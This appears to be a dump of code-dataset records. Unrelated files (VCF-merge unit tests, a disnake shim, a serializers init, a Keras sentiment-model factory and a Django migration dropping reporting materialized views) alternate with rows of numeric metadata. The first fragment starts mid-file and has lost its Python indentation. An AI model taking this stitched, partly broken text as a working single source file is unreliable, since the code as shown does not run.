self.assertListEqual(['HG00096', 'HG00097'], sorted(sample_names_list))
def test_merge_vcfs_multiple_by_dir_bgzipped(self):
# NB: This method works on *already-bgzipped-and-indexed* vcf files, which is why I'm depending on
# pre-provided test files rather than making my own temporary test files.
# put the output file in a temporary directory so it will be automatically cleaned up when test finishes
temp_dir = tempfile.TemporaryDirectory()
expected_output_vcf_fp = os.path.join(temp_dir.name, "tempy.vcf")
real_output_vcf_fp = ns_test.merge_vcfs(self.test_file_dir, temp_dir.name, "tempy", vcfs_gzipped=True)
self.assertEqual(expected_output_vcf_fp, real_output_vcf_fp)
# NB: Again, I am not checking the *contents* of this files; it is created by a subprocess call to an outside
# programs and I am going to trust that outside program does its job as advertised.
self.assertTrue(os.path.isfile(real_output_vcf_fp))
self.assertTrue(os.stat(real_output_vcf_fp).st_size > 0) # file size > 0
with open(real_output_vcf_fp, 'r') as f:
sample_names_list = vcf.Reader(f).samples
self.assertListEqual(['HG00096', 'HG00097'], sorted(sample_names_list))
def test_merge_vcfs_multiple_by_list(self):
temp_dir = tempfile.TemporaryDirectory()
temp_HG00096_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
temp_HG00096_vcf_file.write(self.HG00096_VCF_CONTENTS.encode('ascii'))
temp_HG00096_vcf_file.close() # but DON'T delete yet
temp_HG00097_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
temp_HG00097_vcf_file.write(self.HG00097_VCF_CONTENTS.encode('ascii'))
temp_HG00097_vcf_file.close() # but DON'T delete yet
# NB: doesn't matter what value is passed for vcfs_gzipped, as it isn't used when list is passed
expected_output_vcf_fp = os.path.join(temp_dir.name, "tempy.vcf")
# NB: doesn't matter what value is passed for vcfs_gzipped, as it isn't used when list is passed
real_output_vcf_fp = ns_test.merge_vcfs(temp_dir.name, temp_dir.name, "tempy",
[temp_HG00096_vcf_file.name, temp_HG00097_vcf_file.name])
self.assertEqual(expected_output_vcf_fp, real_output_vcf_fp)
self.assertTrue(os.path.isfile(real_output_vcf_fp))
with open(real_output_vcf_fp, 'r') as f:
sample_names_list = vcf.Reader(f).samples
self.assertListEqual(['HG00096', 'HG00097'], sorted(sample_names_list))
def test_merge_vcfs_single_by_dir(self):
temp_dir = tempfile.TemporaryDirectory()
temp_HG00096_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
temp_HG00096_vcf_file.write(self.HG00096_VCF_CONTENTS.encode('ascii'))
temp_HG00096_vcf_file.close() # but DON'T delete yet
expected_output_vcf_fp = os.path.join(temp_dir.name, os.path.basename(temp_HG00096_vcf_file.name))
# NB: doesn't matter what value is passed for vcfs_gzipped, as it isn't used when there is just one file
real_output_vcf_fp = ns_test.merge_vcfs(temp_dir.name, temp_dir.name, "tempy")
self.assertEqual(expected_output_vcf_fp, real_output_vcf_fp)
self.assertTrue(os.path.isfile(real_output_vcf_fp))
with open(real_output_vcf_fp, 'r') as file_handle:
real_output_contents = file_handle.read()
self.assertEqual(self.HG00096_VCF_CONTENTS, real_output_contents)
with open(real_output_vcf_fp, 'r') as f:
sample_names_list = vcf.Reader(f).samples
self.assertListEqual(['HG00096'], sorted(sample_names_list))
def test_merge_vcfs_single_by_list(self):
temp_dir = tempfile.TemporaryDirectory()
temp_HG00096_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
temp_HG00096_vcf_file.write(self.HG00096_VCF_CONTENTS.encode('ascii'))
temp_HG00096_vcf_file.close() # but DON'T delete yet
expected_output_vcf_fp = os.path.join(temp_dir.name, os.path.basename(temp_HG00096_vcf_file.name))
# NB: doesn't matter what value is passed for vcfs_gzipped, as it isn't used when list is passed
real_output_vcf_fp = ns_test.merge_vcfs(temp_dir.name, temp_dir.name, "tempy", [temp_HG00096_vcf_file.name])
self.assertEqual(expected_output_vcf_fp, real_output_vcf_fp)
self.assertTrue(os.path.isfile(real_output_vcf_fp))
with open(real_output_vcf_fp, 'r') as file_handle:
real_output_contents = file_handle.read()
self.assertEqual(self.HG00096_VCF_CONTENTS, real_output_contents)
with open(real_output_vcf_fp, 'r') as f:
sample_names_list = vcf.Reader(f).samples
self.assertListEqual(['HG00096'], sorted(sample_names_list))
def test_merge_vcfs_single_already_bgzipped(self):
# NB: This method works on *already-bgzipped-and-indexed* vcf files, which is why I'm depending on
# pre-provided test files rather than making my own temporary test files.
# put the output file in a temporary directory so it will be automatically cleaned up when test finishes
temp_dir = tempfile.TemporaryDirectory()
expected_output_vcf_fp = os.path.join(temp_dir.name, os.path.basename(self.test_bgzipped_fps[0]))
# NB: doesn't matter what value is passed for vcfs_gzipped, as it isn't used when list is passed
real_output_vcf_fp = ns_test.merge_vcfs(temp_dir.name, temp_dir.name, "tempy", [self.test_bgzipped_fps[0]])
self.assertEqual(expected_output_vcf_fp, real_output_vcf_fp)
self.assertTrue(os.path.isfile(real_output_vcf_fp))
# NB: open with rb, not r, as this is a binary file
with open(real_output_vcf_fp, 'rb') as f:
sample_names_list = vcf.Reader(f).samples
self.assertListEqual(['HG00096'], sorted(sample_names_list))
def test_merge_vcfs_single_no_copy_needed(self):
temp_dir = tempfile.TemporaryDirectory()
temp_HG00096_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
temp_HG00096_vcf_file.write(self.HG00096_VCF_CONTENTS.encode('ascii'))
temp_HG00096_vcf_file.close() # but DON'T delete yet
temp_HG00096_vcf_base = os.path.splitext(os.path.basename(temp_HG00096_vcf_file.name))[0]
expected_output_vcf_fp = os.path.join(temp_dir.name, temp_HG00096_vcf_base + ns_test.VCF_EXTENSION)
# NB: doesn't matter what value is passed for vcfs_gzipped, as it isn't used when list is passed
real_output_vcf_fp = ns_test.merge_vcfs(temp_dir.name, temp_dir.name, temp_HG00096_vcf_base,
[temp_HG00096_vcf_file.name])
self.assertEqual(expected_output_vcf_fp, real_output_vcf_fp)
self.assertTrue(os.path.isfile(real_output_vcf_fp))
with open(real_output_vcf_fp, 'r') as f:
sample_names_list = vcf.Reader(f).samples
self.assertListEqual(['HG00096'], sorted(sample_names_list))
def test_merge_vcfs_by_dir_error_no_files_found_not_bgzipped(self):
temp_dir = tempfile.TemporaryDirectory()
# NB: This file is NOT REALLY BGZIPPED--but for this test all I need is a file with the bgzipped *extension* :)
temp_HG00096_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.BGZIPPED_VCF_EXTENSION,
delete=False)
temp_HG00096_vcf_file.write(self.HG00096_VCF_CONTENTS.encode('ascii'))
temp_HG00096_vcf_file.close() # but DON'T delete yet
# there is a file in the directory, but it doesn't have the desired extension
with self.assertRaises(ValueError):
ns_test.merge_vcfs(temp_dir.name, temp_dir.name, "tempy")
def test_merge_vcfs_by_dir_error_no_files_found_bgzipped(self):
temp_dir = tempfile.TemporaryDirectory()
temp_HG00096_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
temp_HG00096_vcf_file.write(self.HG00096_VCF_CONTENTS.encode('ascii'))
temp_HG00096_vcf_file.close() # but DON'T delete yet
# there is a file in the directory, but it doesn't have the desired extension
with self.assertRaises(ValueError):
ns_test.merge_vcfs(temp_dir.name, temp_dir.name, "tempy", vcfs_gzipped=True)
def test_merge_vcfs_by_list_error_no_files_found(self):
# create a new, empty directory with no vcfs in it
temp_dir = tempfile.TemporaryDirectory()
with self.assertRaises(ValueError):
ns_test.merge_vcfs(temp_dir.name, temp_dir.name, "tempy", [])
# endregion
| 63.026764 | 263 | 0.745097 | 8,347 | 51,808 | 4.513118 | 0.10998 | 0.035306 | 0.140479 | 0.179183 | 0.956253 | 0.947997 | 0.93714 | 0.929123 | 0.92469 | 0.911338 | 0 | 0.120497 | 0.101509 | 51,808 | 821 | 264 | 63.103532 | 0.68878 | 0.060087 | 0 | 0.869565 | 0 | 0.112202 | 0.759483 | 0.504615 | 0 | 0 | 0 | 0 | 0.053296 | 1 | 0.02805 | false | 0.036466 | 0.007013 | 0 | 0.040673 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
6df69d67b78e98c92ddf663e148e02d01a098ac1 | 148 | py | Python | discord/ext/commands/_types.py | kuzaku-developers/disnake | 61cc1ad4c2bafd39726a1447c85f7e469e41af10 | [
"MIT"
] | null | null | null | discord/ext/commands/_types.py | kuzaku-developers/disnake | 61cc1ad4c2bafd39726a1447c85f7e469e41af10 | [
"MIT"
] | null | null | null | discord/ext/commands/_types.py | kuzaku-developers/disnake | 61cc1ad4c2bafd39726a1447c85f7e469e41af10 | [
"MIT"
] | null | null | null | from disnake.ext.commands._types import *
from disnake.ext.commands._types import __dict__ as __original_dict__
locals().update(__original_dict__)
| 29.6 | 69 | 0.837838 | 20 | 148 | 5.4 | 0.55 | 0.203704 | 0.259259 | 0.407407 | 0.611111 | 0.611111 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081081 | 148 | 4 | 70 | 37 | 0.794118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
0968828e29d25c34f50c72a4535d48959b3d4d1c | 129 | py | Python | todo/todos/serializers/__init__.py | hadipirhadi/scalors-assignment-backend | 93d28b9be23375eeb27eaa17663bd86e06318000 | [
"MIT"
] | null | null | null | todo/todos/serializers/__init__.py | hadipirhadi/scalors-assignment-backend | 93d28b9be23375eeb27eaa17663bd86e06318000 | [
"MIT"
] | null | null | null | todo/todos/serializers/__init__.py | hadipirhadi/scalors-assignment-backend | 93d28b9be23375eeb27eaa17663bd86e06318000 | [
"MIT"
] | null | null | null | from .board_serializer import *
from .todo_serializer import *
from .user_serializer import *
from .reminder_serializer import *
| 25.8 | 34 | 0.813953 | 16 | 129 | 6.3125 | 0.4375 | 0.633663 | 0.594059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.124031 | 129 | 4 | 35 | 32.25 | 0.893805 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
110c2edb6ad4d6eb5d5521e82f2307435978aa53 | 2,535 | py | Python | model_factory.py | CarlFredriksson/sentiment_classification | ca7f23ec1e153d0cec19923082de6614767a4931 | [
"MIT"
] | null | null | null | model_factory.py | CarlFredriksson/sentiment_classification | ca7f23ec1e153d0cec19923082de6614767a4931 | [
"MIT"
] | null | null | null | model_factory.py | CarlFredriksson/sentiment_classification | ca7f23ec1e153d0cec19923082de6614767a4931 | [
"MIT"
] | null | null | null | from keras.models import Sequential, Input, Model
from keras.layers import Dense, Flatten, Embedding, Average, Activation, Lambda, Dropout, LSTM, Bidirectional
from keras.initializers import Constant
import numpy as np
import keras.backend as K
from keras import regularizers
def create_baseline_model(embedding_matrix, input_len):
model = Sequential()
model.add(Embedding(embedding_matrix.shape[0], embedding_matrix.shape[1],
embeddings_initializer=Constant(embedding_matrix), input_length=input_len,
trainable=False, mask_zero=True))
model.add(Lambda(lambda x: K.mean(x, axis=1)))
model.add(Dense(1, activation="sigmoid"))
model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])
return model
def create_rnn_model(embedding_matrix, input_len):
model = Sequential()
model.add(Embedding(embedding_matrix.shape[0], embedding_matrix.shape[1],
embeddings_initializer=Constant(embedding_matrix), input_length=input_len,
trainable=False, mask_zero=True))
model.add(LSTM(64, return_sequences=True, recurrent_dropout=0.5))
model.add(Dropout(0.5))
model.add(LSTM(64))
model.add(Dense(64, activation="relu"))
model.add(Dense(1, activation="sigmoid"))
model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])
return model
def create_bidir_rnn_model(embedding_matrix, input_len):
model = Sequential()
model.add(Embedding(embedding_matrix.shape[0], embedding_matrix.shape[1],
embeddings_initializer=Constant(embedding_matrix), input_length=input_len,
trainable=False, mask_zero=True))
model.add(Bidirectional(LSTM(64, return_sequences=True, recurrent_dropout=0.5)))
model.add(Bidirectional(LSTM(64)))
model.add(Dropout(0.5))
model.add(Dense(64, activation="relu"))
model.add(Dense(1, activation="sigmoid"))
model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])
return model
def create_train_emb_rnn_model(embedding_matrix, input_len):
model = Sequential()
model.add(Embedding(embedding_matrix.shape[0], embedding_matrix.shape[1], input_length=input_len, mask_zero=True))
model.add(LSTM(64, return_sequences=True, recurrent_dropout=0.5))
model.add(Dropout(0.5))
model.add(LSTM(64))
model.add(Dropout(0.5))
model.add(Dense(64, activation="relu"))
model.add(Dense(1, activation="sigmoid"))
model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])
return model | 46.944444 | 118 | 0.741223 | 337 | 2,535 | 5.412463 | 0.189911 | 0.096491 | 0.087719 | 0.053728 | 0.834978 | 0.820724 | 0.820724 | 0.820724 | 0.820724 | 0.820724 | 0 | 0.020325 | 0.126627 | 2,535 | 54 | 119 | 46.944444 | 0.803523 | 0 | 0 | 0.72 | 0 | 0 | 0.064669 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0 | 0.12 | 0 | 0.28 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1116c8052e9edaa2d49ecc9d6aeba3214818ff94 | 16,194 | py | Python | koku/reporting/migrations/0213_delete_mat_views.py | bsquizz/koku | 386dd6ca4a4fd1b50790a929acc81d2dc245a91c | [
"Apache-2.0"
] | null | null | null | koku/reporting/migrations/0213_delete_mat_views.py | bsquizz/koku | 386dd6ca4a4fd1b50790a929acc81d2dc245a91c | [
"Apache-2.0"
] | null | null | null | koku/reporting/migrations/0213_delete_mat_views.py | bsquizz/koku | 386dd6ca4a4fd1b50790a929acc81d2dc245a91c | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.1.13 on 2022-01-07 01:46
from django.db import migrations
SQL_TMPL = """DROP MATERIALIZED VIEW IF EXISTS {} CASCADE ;"""
def drop_matview_sql(model_str):
return SQL_TMPL.format(model_str)
class Migration(migrations.Migration):
dependencies = [("reporting", "0212_auto_20211203_1640")]
operations = [
migrations.RunSQL(sql=drop_matview_sql("reporting_aws_compute_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="AWSComputeSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_aws_compute_summary_by_account"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="AWSComputeSummaryByAccount"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_aws_compute_summary_by_region"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="AWSComputeSummaryByRegion"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_aws_compute_summary_by_service"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="AWSComputeSummaryByService"),
migrations.RunSQL(sql=drop_matview_sql("reporting_aws_cost_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="AWSCostSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_aws_cost_summary_by_account"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="AWSCostSummaryByAccount"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_aws_cost_summary_by_region"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="AWSCostSummaryByRegion"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_aws_cost_summary_by_service"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="AWSCostSummaryByService"),
migrations.RunSQL(sql=drop_matview_sql("reporting_aws_database_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="AWSDatabaseSummary"),
migrations.RunSQL(sql=drop_matview_sql("reporting_aws_network_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="AWSNetworkSummary"),
migrations.RunSQL(sql=drop_matview_sql("reporting_aws_storage_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="AWSStorageSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_aws_storage_summary_by_account"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="AWSStorageSummaryByAccount"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_aws_storage_summary_by_region"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="AWSStorageSummaryByRegion"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_aws_storage_summary_by_service"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="AWSStorageSummaryByService"),
migrations.RunSQL(sql=drop_matview_sql("reporting_azure_compute_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="AzureComputeSummary"),
migrations.RunSQL(sql=drop_matview_sql("reporting_azure_cost_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="AzureCostSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_azure_cost_summary_by_account"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="AzureCostSummaryByAccount"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_azure_cost_summary_by_location"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="AzureCostSummaryByLocation"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_azure_cost_summary_by_service"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="AzureCostSummaryByService"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_azure_database_summary"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="AzureDatabaseSummary"),
migrations.RunSQL(sql=drop_matview_sql("reporting_azure_network_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="AzureNetworkSummary"),
migrations.RunSQL(sql=drop_matview_sql("reporting_azure_storage_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="AzureStorageSummary"),
migrations.RunSQL(sql=drop_matview_sql("reporting_gcp_compute_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="GCPComputeSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_gcp_compute_summary_by_account"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="GCPComputeSummaryByAccount"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_gcp_compute_summary_by_project"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="GCPComputeSummaryByProject"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_gcp_compute_summary_by_region"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="GCPComputeSummaryByRegion"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_gcp_compute_summary_by_service"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="GCPComputeSummaryByService"),
migrations.RunSQL(sql=drop_matview_sql("reporting_gcp_cost_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="GCPCostSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_gcp_cost_summary_by_account"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="GCPCostSummaryByAccount"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_gcp_cost_summary_by_project"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="GCPCostSummaryByProject"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_gcp_cost_summary_by_region"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="GCPCostSummaryByRegion"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_gcp_cost_summary_by_service"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="GCPCostSummaryByService"),
migrations.RunSQL(sql=drop_matview_sql("reporting_gcp_database_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="GCPDatabaseSummary"),
migrations.RunSQL(sql=drop_matview_sql("reporting_gcp_network_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="GCPNetworkSummary"),
migrations.RunSQL(sql=drop_matview_sql("reporting_gcp_storage_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="GCPStorageSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_gcp_storage_summary_by_account"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="GCPStorageSummaryByAccount"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_gcp_storage_summary_by_project"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="GCPStorageSummaryByProject"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_gcp_storage_summary_by_region"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="GCPStorageSummaryByRegion"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_gcp_storage_summary_by_service"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="GCPStorageSummaryByService"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpall_compute_summary"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAllComputeSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpall_compute_summary_p"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAllComputeSummaryP"),
migrations.RunSQL(sql=drop_matview_sql("reporting_ocpall_cost_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="OCPAllCostSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpall_cost_summary_by_account"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAllCostSummaryByAccount"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpall_cost_summary_by_account_p"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAllCostSummaryByAccountP"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpall_cost_summary_by_region"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAllCostSummaryByRegion"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpall_cost_summary_by_region_p"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAllCostSummaryByRegionP"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpall_cost_summary_by_service"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAllCostSummaryByService"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpall_cost_summary_by_service_p"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAllCostSummaryByServiceP"),
migrations.RunSQL(sql=drop_matview_sql("reporting_ocpall_cost_summary_p"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="OCPAllCostSummaryP"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpall_database_summary"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAllDatabaseSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpall_database_summary_p"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAllDatabaseSummaryP"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpall_network_summary"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAllNetworkSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpall_network_summary_p"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAllNetworkSummaryP"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpall_storage_summary"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAllStorageSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpall_storage_summary_p"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAllStorageSummaryP"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpaws_compute_summary"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAWSComputeSummary"),
migrations.RunSQL(sql=drop_matview_sql("reporting_ocpaws_cost_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="OCPAWSCostSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpaws_cost_summary_by_account"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAWSCostSummaryByAccount"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpaws_cost_summary_by_region"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAWSCostSummaryByRegion"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpaws_cost_summary_by_service"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAWSCostSummaryByService"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpaws_database_summary"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAWSDatabaseSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpaws_network_summary"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAWSNetworkSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpaws_storage_summary"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAWSStorageSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpazure_compute_summary"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAzureComputeSummary"),
migrations.RunSQL(sql=drop_matview_sql("reporting_ocpazure_cost_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="OCPAzureCostSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpazure_cost_summary_by_account"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAzureCostSummaryByAccount"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpazure_cost_summary_by_location"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAzureCostSummaryByLocation"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpazure_cost_summary_by_service"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAzureCostSummaryByService"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpazure_database_summary"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAzureDatabaseSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpazure_network_summary"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAzureNetworkSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocpazure_storage_summary"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPAzureStorageSummary"),
migrations.RunSQL(sql=drop_matview_sql("reporting_ocp_cost_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="OCPCostSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocp_cost_summary_by_node"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPCostSummaryByNode"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocp_cost_summary_by_project"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPCostSummaryByProject"),
migrations.RunSQL(sql=drop_matview_sql("reporting_ocp_pod_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="OCPPodSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocp_pod_summary_by_project"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPPodSummaryByProject"),
migrations.RunSQL(sql=drop_matview_sql("reporting_ocp_volume_summary"), reverse_sql=migrations.RunSQL.noop),
migrations.DeleteModel(name="OCPVolumeSummary"),
migrations.RunSQL(
sql=drop_matview_sql("reporting_ocp_volume_summary_by_project"), reverse_sql=migrations.RunSQL.noop
),
migrations.DeleteModel(name="OCPVolumeSummaryByProject"),
]
